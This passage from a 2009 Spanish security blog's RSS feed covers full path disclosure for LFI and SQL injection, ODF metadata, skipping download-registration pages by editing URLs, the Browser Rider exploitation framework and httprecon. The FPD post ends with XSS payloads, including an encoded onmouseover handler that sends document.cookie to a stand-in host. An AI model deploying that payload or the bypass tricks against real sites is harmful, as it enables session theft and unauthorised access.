/&gt;&lt;br /&gt;Entonces el FPD consiste en que tras introducir valores malformados podamos obtener errores de los cuales extraer la ruta. Esto te va sonando más, ¿Verdad? Son los clásicos errores de:&lt;br /&gt;&lt;code&gt;&lt;b&gt;&lt;br /&gt;Warning: main(/include/lang/es.php): failed to open stream: No such file or directory in /home/PoC/include/global.php on line 18&lt;br /&gt;&lt;br /&gt;Warning: main(): Failed opening '/include/lang/es.php' for inclusion (include_path='.:/home/PoC/include') in /home/miarroba/include/global.php on line 18 t&lt;br /&gt;&lt;/b&gt;&lt;/code&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En ese error encontramos el más clásico entre los clásicos errores que nos aparecen al tratar de explotar un LFI. Y es en este momento donde te das cuenta de para qué sirve estos errores... Como acabo de decir, en los LFIs es muy interesante para poder localizar el lugar donde se encuentran los ficheros que incluye (P.E.: $path = "/Includes/Juaker/".$_GET['file']; include($path);, ya sabes qeu si tu shell está en /Includes/Upload/, vas a necesitar aplicar un ../ para saltar a /Includes/). Otro ejemplo común puede ser para emplear sentencias de volcado de contenido de ficheros a través de SQLi, donde por ejemplo para emplear load_file() necesitaremos conocer el path exacto de donde se encuentra el fichero que le pasamos como parámetro.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pero hasta ahora hemos estado hablando de forma muy abstracta, mucho bla bla y poco movimiento, así que procedo algunas formas de provocar un FPD. Por supuesto que la más clásica y mítica es introducir un fichero inexistente como parámetro a una función del script que trabaje con ficheros... como no encuentra el archivo, nos arrojará un error al estilo del que ya he mostrado.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En general esto de meter parámetros malformados o erróneos suele funcionar en bastantes ámbitos, por ejemplo, si hacemos un clásico SQLi a un sistema que corre Windows, lo más probable es que nos encontremos con un mensajito de error volcado por OLE DB en el cual encontraremos la ruta del script que obtuvo el error. Otro escenario, quizás menos habitual pero igualmente interesante, es la de provocar Null Sessions (o introducir caracteres extraños en una cookie) para que session_start() de un error (idea sacada de OWASP).&lt;br /&gt;&lt;br /&gt;La última forma que se me ocurre ahora mismo es una que leí de Xianur0 en su paper sobre vulnerabilidades en SMF, y es la de usar un array vacío. Por ejemplo: /index.php=seth[]=SUCKS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Creo que las vulnerabilidades de Sensitive Information al estilo de esta están muy infravaloradas, ya que casi siempre (quizás soy el único ser humano al que le ocurre esto) son un recurso interesante y útil a la hora de una auditoría de seguridad en WebApps.&lt;br /&gt;&lt;br /&gt;Y cómo solucionarlo... facil, en las directivas poner error_reporting(0) :D&lt;br /&gt;&lt;br /&gt;Byt3z&lt;br /&gt;&lt;br /&gt;PD: Si conoceis más métodos de provocar FPDs, posteadlos.&lt;br /&gt;&lt;br /&gt;PD: onmouseover="h=String.fromCharCode(104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,99,111,46,112,104,112,63,99,107,61);document.location(h.concat(document.cookie);"&lt;br /&gt;PD2: onclick="alert(String.fromCharCode(112,114,117,101,98,97,115,53));"&lt;br /&gt;PD3:"onmouseover="alert(String.fromCharCode(112,114,117,101,98,97,115,54));"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-4187440302561500059?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=7Kt43lKPi5Y:nN0LcPFh5os:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/7Kt43lKPi5Y" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-19T00:11:03.514+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/full-path-disclosure-fpd.html</feedburner:origLink></item><item><title>Metadatos III: OpenOffice</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/5q2MwdnIqiU/metadatos-iii-openoffice.html</link><category>Metadatos</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Mon, 13 Apr 2009 01:47:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-5651114864917513567</guid><description>Saludos a  todos,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Hoy vamos a hablar de los metadatos en los archivos ofimáticos creados con OpenOffice (que abreviaremos con OO a partir de este momento), ya que está bastante referenciada y es relativamente fácil de entender. &lt;br /&gt;&lt;br /&gt;   OpenOffice trabaja con ODF, un formato de archivos orientado al almacenamiento de aplicaciones ofimáticas que está basado en un esquema XML. Si se trata de "almacenamiento", podemos deducir que contiene ficheros dentro. Para poder ver que tiene simplemente click derecho-&gt;Extraer aquí; y como resultado tendremos carpetas y archivos, de entrada podemos ver:&lt;br /&gt;&lt;br /&gt;------[directorios]---&lt;br /&gt;&lt;br /&gt;META-INF/&lt;br /&gt;Thumbnails/&lt;br /&gt;Pictures/&lt;br /&gt;Configurations2/&lt;br /&gt;&lt;br /&gt;------[Archivos]---&lt;br /&gt;&lt;br /&gt;content.xml&lt;br /&gt;meta.xml&lt;br /&gt;settings.xml&lt;br /&gt;styles.xml&lt;br /&gt;mimetype&lt;br /&gt;layout-cache&lt;br /&gt;&lt;br /&gt;   Dentro de cada directorio encontraremos más ficheros, pero que a nosotros nos interse realmente, sólo es meta.xml, aunque como metadata "real" manifest.xml también merece ser mencionado.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Dentro de META-INF como podemos pensar a simple vista encontraremos metadatos, pero no de esos jugosos que a nosotros nos interesa, si no que nos encontramos un archivo .xml llamado "manifest.xml", si lo abrimos:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img509.imageshack.us/img509/2863/pantallazoa.png"&gt;&lt;img src="http://img509.imageshack.us/img509/2863/pantallazoa.png" width=600 height=500&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Podremos ver un listado de las carpetas y archivos que se encuentran dentro del documento ODF. Nada intersante, si lo comparamos con con lo que podemos encontrar en meta.xml. Ahí encontramos todo lo que buscamos, authores, editores, fechas, programa con que se generó, fechas, editajes, etc... &lt;br /&gt;            &lt;br /&gt;&lt;a href="http://img382.imageshack.us/img382/2295/pantallazo.png"&gt;&lt;img src="http://img382.imageshack.us/img382/2295/pantallazo.png" width=600 height=500&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Si se desea aprender más sobre ODF y los metadatos, existe bastante información en la página oficial, aquí dejo sólo un link, pero os aseguro qeu es fácil encontrar toda la información de forma detallada:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.oasis-open.org/committees/download.php/26847/08-01-16-ODF-Metadata-Proposal-Committee-Draft.odt"&gt;ODF 1.2 Metadata specification&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Byt3z&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-5651114864917513567?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=5q2MwdnIqiU:IVFMw3pIMUI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/5q2MwdnIqiU" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-13T11:27:05.284+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><media:content url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/Peo0hNO4TLI/08-01-16-ODF-Metadata-Proposal-Committee-Draft.odt" fileSize="46971" type="application/vnd.oasis.opendocument.text" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Saludos a todos, Hoy vamos a hablar de los metadatos en los archivos ofimáticos creados con OpenOffice (que abreviaremos con OO a partir de este momento), ya que está bastante referenciada y es relativamente fácil de entender. OpenOffice trabaja con ODF, </itunes:subtitle><itunes:author>Copyright: "Vengador de las Sombras"</itunes:author><itunes:summary>Saludos a todos, Hoy vamos a hablar de los metadatos en los archivos ofimáticos creados con OpenOffice (que abreviaremos con OO a partir de este momento), ya que está bastante referenciada y es relativamente fácil de entender. OpenOffice trabaja con ODF, un formato de archivos orientado al almacenamiento de aplicaciones ofimáticas que está basado en un esquema XML. Si se trata de "almacenamiento", podemos deducir que contiene ficheros dentro. Para poder ver que tiene simplemente click derecho-Extraer aquí; y como resultado tendremos carpetas y archivos, de entrada podemos ver: ------[directorios]--- META-INF/ Thumbnails/ Pictures/ Configurations2/ ------[Archivos]--- content.xml meta.xml settings.xml styles.xml mimetype layout-cache Dentro de cada directorio encontraremos más ficheros, pero que a nosotros nos interse realmente, sólo es meta.xml, aunque como metadata "real" manifest.xml también merece ser mencionado. Dentro de META-INF como podemos pensar a simple vista encontraremos metadatos, pero no de esos jugosos que a nosotros nos interesa, si no que nos encontramos un archivo .xml llamado "manifest.xml", si lo abrimos: Podremos ver un listado de las carpetas y archivos que se encuentran dentro del documento ODF. Nada intersante, si lo comparamos con con lo que podemos encontrar en meta.xml. Ahí encontramos todo lo que buscamos, authores, editores, fechas, programa con que se generó, fechas, editajes, etc... Si se desea aprender más sobre ODF y los metadatos, existe bastante información en la página oficial, aquí dejo sólo un link, pero os aseguro qeu es fácil encontrar toda la información de forma detallada: ODF 1.2 Metadata specification Byt3z</itunes:summary><itunes:keywords>Hack,hacking,hackers</itunes:keywords><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/metadatos-iii-openoffice.html</feedburner:origLink><enclosure url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/Peo0hNO4TLI/08-01-16-ODF-Metadata-Proposal-Committee-Draft.odt" length="46971" type="application/vnd.oasis.opendocument.text" /><feedburner:origEnclosureLink>http://www.oasis-open.org/committees/download.php/26847/08-01-16-ODF-Metadata-Proposal-Committee-Draft.odt</feedburner:origEnclosureLink></item><item><title>Saltarse el "tenes que estar registrado para..."</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/Hwx2Po-dBdw/saltarse-el-tenes-que-estar-registrado.html</link><category>Seguridad por oscuridad</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Fri, 10 Apr 2009 22:55:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-1932823197512470950</guid><description>Hay páginas que ofrecen recursos (imágenes, libros en pdf, etc) gratis, pero para descargarlos piden que te registres. Por ejemplo planetrenders quiero bajarme &lt;a href="http://planetrenders.net/renders/displayimage.php?pos=-27554"&gt;este&lt;/a&gt; render. Pueden ver la imágen chica pero para bajarla en tamaño completo te piden que te registres.&lt;br /&gt;La url de la vista previa es esta: &lt;a href="http://planetrenders.net/renders/albums/userpics/24332/normal_papillon%20copie.png"&gt;http://planetrenders.net/renders/albums/userpics/24332/normal_papillon%20copie.png&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Simplemente le borramos el "normal_" y la tenemos del tamaño original: &lt;a href="http://planetrenders.net/renders/albums/userpics/24332/papillon%20copie.png"&gt;http://planetrenders.net/renders/albums/userpics/24332/papillon%20copie.png&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Funciona en todos.&lt;br /&gt;&lt;br /&gt;En otra webs, al querer bajar algo nos lleva a una web asi: http://example.com/register.php?url=http://example.com/downloads/nombre-de-un-archivo.rar&lt;br /&gt;&lt;br /&gt;Esto es para que nos registremos y despues nos redirija a http://example.com/downloads/nombre-de-un-archivo.rar&lt;br /&gt;En muchos casos, al abrir esa url ya descargamos el archivo. También puede ser que se pase por post, hay que mirar las cabeceras http.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-1932823197512470950?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=Hwx2Po-dBdw:xM9WB7bSLdQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/Hwx2Po-dBdw" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-24T00:04:59.315+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/saltarse-el-tenes-que-estar-registrado.html</feedburner:origLink></item><item><title>Browser Rider: what you never expected your browser could do to you</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/byg-l9tvyVc/browser-rider-what-you-never-expected.html</link><category>Browser Rider</category><category>Payloads</category><category>Hacking Framework</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Wed, 08 Apr 2009 06:53:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-6606459665829813330</guid><description>Bueno la verdad es que no tengo demasiado tiempo para contruir un buen artículo (15 minutos XD) ya que al igual que The X-C3LL también parto de vacaciones a mi pueblo, así que en nuestra ausencia me temo que le tocara a seth mantener el blog :P&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Y otra de OWASP se podría decir. Ayer por la noche después de haber estado jugando un poco con igoogle, estaba mirando las conferencias que ya habían terminado haber si podía agarrar algún paper/video de algún sitio. En eso que vi que la &lt;a href="https://www.owasp.org/index.php/OWASP_AU_Conference_2009"&gt;Australia conference&lt;/a&gt; ya había finalizado hace tiempo. Y buscando llegué a las &lt;a href="https://www.owasp.org/index.php/OWASP_AU_Conference_2009_Presentations"&gt;presentaciones&lt;/a&gt; , vi una que me llamó especialmente la atención.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Browser Rider: what you never expected your browser could do to you&lt;br /&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;Browser exploitation is in fashion but it doesn't seem that there's a popular tool to build and run attacks. Browser Rider will try to fill the gap by providing a framework to build, deploy and manage payloads that exploit the browser. This project aims on the long term to provide a powerful, simple and flexible interface to any client side attack for hackers. &lt;/p&gt;&lt;p&gt;Proposal &lt;/p&gt;&lt;p&gt;Browser security has become one of the most discussed subjects. This is mainly due to two things: First, nowadays malwares are not spread over emails any longer but through web application often using JavaScript obfuscation to avoid anti-virus detection. Second as the web is growing new technologies are constantly appearing to enhance the user experience but also offering many new attack vectors. In both cases it is important to understand that the browser offers an easy mechanism for bypassing firewalls and other perimeter security to gain unauthorised access or commit other security breach. &lt;/p&gt;&lt;p&gt;From a security consultant point of view it can be hard to justify the risk of vulnerabilities that affect the browser such as cross-site scripting, cross-site request forgery and unauthorized redirection vulnerabilities as they do not impact directly the server or the database. &lt;/p&gt;&lt;p&gt;Browser rider is a security tool to exploit browser vulnerabilities. It offers several existing payloads but also provides a complete programming framework to develop exploits. It also acts as a management system to deploy your attacks and control the infected browsers. &lt;/p&gt;&lt;p&gt;The first part of this presentation will introduce the audience to the tool and demonstrate many attacks that can be ported to the browser using the Browser Rider. The second part will technically explain how the tool works (i.e. obfuscation, signature detection avoidance, polymorphism, program architecture, framework), how to write your own exploits with it and deploy them. &lt;/p&gt;&lt;p&gt;On the long term Browser Rider aims at becoming a complete solution to execute, develop and test browser based attacks for security consultants. &lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Google un poco y encontré la página oficial de esté proyecto, junto a una presentación ppt.&lt;br /&gt;&lt;/p&gt;&lt;a href="http://engineeringforfun.com/browserrider.html"&gt;Browser Rider - A hacking framework for browser explotation&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://engineeringforfun.com/cave/presentations/BrowserRider_OWASP20090204.ppt"&gt;Browser Rider OWASP 2009 Melbourne Chapter&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Básicamente es un framework basado en payloads una interfaz simple y manejable para cualquier tipo de cliente que se pueda explotar.&lt;br /&gt;&lt;br /&gt;Les recomiendo que prueben la demo online y que consulten la documentación de la wiki.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.engineeringforfun.com/wiki/index.php/Main_Page"&gt;Engineering For Fun Wiki&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Saludos a todos y felices pascuas!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre id="line1"&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-6606459665829813330?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=byg-l9tvyVc:Xo5NAPsdeBQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/byg-l9tvyVc" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-08T16:36:32.408+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><media:content url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/il9NHzREIYI/BrowserRider_OWASP20090204.ppt" fileSize="224768" type="application/vnd.ms-powerpoint" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Bueno la verdad es que no tengo demasiado tiempo para contruir un buen artículo (15 minutos XD) ya que al igual que The X-C3LL también parto de vacaciones a mi pueblo, así que en nuestra ausencia me temo que le tocara a seth mantener el blog :P ----------</itunes:subtitle><itunes:author>Copyright: "Vengador de las Sombras"</itunes:author><itunes:summary>Bueno la verdad es que no tengo demasiado tiempo para contruir un buen artículo (15 minutos XD) ya que al igual que The X-C3LL también parto de vacaciones a mi pueblo, así que en nuestra ausencia me temo que le tocara a seth mantener el blog :P ------------------------------------------------------------------------------------------------- Y otra de OWASP se podría decir. Ayer por la noche después de haber estado jugando un poco con igoogle, estaba mirando las conferencias que ya habían terminado haber si podía agarrar algún paper/video de algún sitio. En eso que vi que la Australia conference ya había finalizado hace tiempo. Y buscando llegué a las presentaciones , vi una que me llamó especialmente la atención. Browser Rider: what you never expected your browser could do to you Browser exploitation is in fashion but it doesn't seem that there's a popular tool to build and run attacks. Browser Rider will try to fill the gap by providing a framework to build, deploy and manage payloads that exploit the browser. This project aims on the long term to provide a powerful, simple and flexible interface to any client side attack for hackers. Proposal Browser security has become one of the most discussed subjects. This is mainly due to two things: First, nowadays malwares are not spread over emails any longer but through web application often using JavaScript obfuscation to avoid anti-virus detection. Second as the web is growing new technologies are constantly appearing to enhance the user experience but also offering many new attack vectors. In both cases it is important to understand that the browser offers an easy mechanism for bypassing firewalls and other perimeter security to gain unauthorised access or commit other security breach. From a security consultant point of view it can be hard to justify the risk of vulnerabilities that affect the browser such as cross-site scripting, cross-site request forgery and unauthorized redirection vulnerabilities as they do not impact directly the server or the database. Browser rider is a security tool to exploit browser vulnerabilities. It offers several existing payloads but also provides a complete programming framework to develop exploits. It also acts as a management system to deploy your attacks and control the infected browsers. The first part of this presentation will introduce the audience to the tool and demonstrate many attacks that can be ported to the browser using the Browser Rider. The second part will technically explain how the tool works (i.e. obfuscation, signature detection avoidance, polymorphism, program architecture, framework), how to write your own exploits with it and deploy them. On the long term Browser Rider aims at becoming a complete solution to execute, develop and test browser based attacks for security consultants. Google un poco y encontré la página oficial de esté proyecto, junto a una presentación ppt. Browser Rider - A hacking framework for browser explotation Browser Rider OWASP 2009 Melbourne Chapter Básicamente es un framework basado en payloads una interfaz simple y manejable para cualquier tipo de cliente que se pueda explotar. Les recomiendo que prueben la demo online y que consulten la documentación de la wiki. Engineering For Fun Wiki Saludos a todos y felices pascuas! </itunes:summary><itunes:keywords>Hack,hacking,hackers</itunes:keywords><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/browser-rider-what-you-never-expected.html</feedburner:origLink><enclosure url="http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~5/il9NHzREIYI/BrowserRider_OWASP20090204.ppt" length="224768" type="application/vnd.ms-powerpoint" /><feedburner:origEnclosureLink>http://engineeringforfun.com/cave/presentations/BrowserRider_OWASP20090204.ppt</feedburner:origEnclosureLink></item><item><title>El día de los e-mails</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/E7F3hsJKhCc/el-dia-de-los-e-mails.html</link><category>E-Mails</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Wed, 08 Apr 2009 00:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-5466873471052138759</guid><description>Saludos a todos, &lt;br /&gt;&lt;br /&gt;  Creo que los miércoles van a ser un buen día para hablar un poco de los comentarios, dudas y sugerencias (tanto negativas como positivas, aquí no censuramos nada) en referente al blog que me llegan a mi buzón.&lt;br /&gt;&lt;br /&gt;  La verdad es que en líneas generales los comentarios han sido positivos de "hey, me gusta tu blog" y similares y el que más se repite "gracias por cambiar de theme, el anterior me producía úlcera", a falta de dos excepciones donde nos ponen a parir. Bueeeno, todo lo que publicamos aquí, o la forma en que lo hacemos, quizá no sea la mejor, aceptamos críticas constructivas... pero algo sí que quiero decir a estas personas...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  En primer lugar a "br3t/\N", el cual en su e-mail nos califica de ir de "Técnicoless". Sinceramente en ningún momento la intencionalidad de este blog es la de asumir los roles de otros personajillos de la red, véase Enrique Dans, y demás personas que viven de la farándula. No queremos ni tener tropecientas visitas, ni ser   "famosetes". Nuestra única intención a través de de este blog es la de transmitir un poco de conocimiento a aquellas personas que se inician en este mundillo o que símplemente desean aprender algo nuevo.&lt;br /&gt;&lt;br /&gt;  Si a través de este blog conseguimos que, aunque sólo un 1% de los lectores, aprendan algo nuevo que les vaya a ser útil, nos damos por satisfechos. Nos consideramos símplemente otro medio de difusión.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; Y al otro e-mail enviado por "Anônim@", que desconozco si ese es su nick o símplemente quería pasar como "anónimo", enviado por RecoverPassHotmail002-at-hotmail-dot-com (esto ya da mucho que pensar la verdad...) símplemente decirle que cuando trate de insultar, por favor no agreda tan salvájemente a la Real Academial Española... un pequeño extracto del mail (una pena que lo haya borrado "sin querer"):&lt;br /&gt;&lt;br /&gt;&lt;b&gt;"(...)Sk sois unns atentics lammmmmeeeeeeeeeeerssssssssssssss pk no tneis ni ide sorbe hackear cuenta msn!!!!!!!!! Io si soi un hacker y le robe la cuenta a ds d mi classsse(...)&lt;br /&gt;&lt;br /&gt;(...)buestrs madrs son uns hijas d pupta, y vstros papas tb!!!(...)"&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;  Clap, Clap, magnífico uso de aquesta nuestra lengua... la verdad es que tras leer esto creo que sufrí un terrible y peligroso ataque por este "juacker": un RKD (Remote Kick Dictionary).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Y por último la primera duda que nos hay llegado, aunque no esté relacionada con las vulnes voy a dejar un link que responde muy bien a la duda de "NW-Perl":&lt;br /&gt;&lt;br /&gt;&lt;b&gt;"¿Podrías por favor dejarme algún link donde se hable del manejo de los metadatos en archivos de música en perl? En concreto me interesaría información sobre el formato MP3"&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://husk.org/perl/id3s/notes.html"&gt;Link&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;En ese link explican bastante bien este tema, espero que te sea de utilidad.&lt;br /&gt;&lt;br /&gt;Lo dicho, sigan mandando sus e-mails, que los miércoles pasaremos a leerlos (y por favor, que sean legibles, no vayan a provocarnos una denegación de servicios por un RKD)&lt;br /&gt;&lt;br /&gt;Byt3z!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-5466873471052138759?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=E7F3hsJKhCc:BoNgzwEKBoI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/E7F3hsJKhCc" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-08T10:08:54.780+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/el-dia-de-los-e-mails.html</feedburner:origLink></item><item><title>httprecon, identificando servidores web</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/bq83gbmmPmQ/httprecon-identificando-servidores-web.html</link><category>HTTP</category><category>Enumeración</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Sun, 05 Apr 2009 15:25:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-4613074016465093649</guid><description>httprecon es un programa para Windows que permite analizar e identificar que servidor http esta corriendo un objetivo. Analiza los banners, códigos de error devueltos, el orden de las cabeceras, etc.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm3.static.flickr.com/2033/2363650256_ebefc22af7.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 486px;" src="http://farm3.static.flickr.com/2033/2363650256_ebefc22af7.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Esta programado en VisualBasic 6 y es de código abierto, además de que se pueden &lt;a href="http://www.computec.ch/projekte/httprecon/?s=database"&gt;ver los datos que utiliza&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.computec.ch/projekte/httprecon/?"&gt;Web&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.computec.ch/projekte/httprecon/?s=download"&gt;Descarga&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.computec.ch/projekte/httprecon/?s=faq"&gt;FAQ&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-4613074016465093649?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=bq83gbmmPmQ:yDHaGcBL7V0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/bq83gbmmPmQ" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-04-08T10:25:45.527+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/04/httprecon-identificando-servidores-web.html</feedburner:origLink></item><item><title>XSS (Cross Site Scripting) Prevention Cheat Sheet</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/Y8xk4RTFzwA/xss-cross-site-scripting-prevention.html</link><category>Protección XSS</category><category>CheatSheet</category><category>XSS</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Sun, 05 Apr 2009 14:20:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-1232940887032607739</guid><description>Buenas! Para los que no me conozcan soy Lix y desde ahora también escribiré en el blog de mi amigo The X-C3LL. Probablemente a algunos les suene mi nombre de los 1000² alagos que me echa Vengador por mis "maravillosos" links que le paso despues de repasar mi burrada de RSS's.&lt;br /&gt;&lt;br /&gt;Espero que todos mis posts les sean de utilidad y que disfruten de ellos.&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Hace algun tiempo cuando The X-C3LL retomó el blog después de su tiempo de inactividad posteo una &lt;a href="http://0verl0ad.blogspot.com/2009/02/xss-cheatsheet.html"&gt;XSS cheat-sheet&lt;/a&gt; , en este post compartió algunos de los metodos mediante los cuales el intentaba 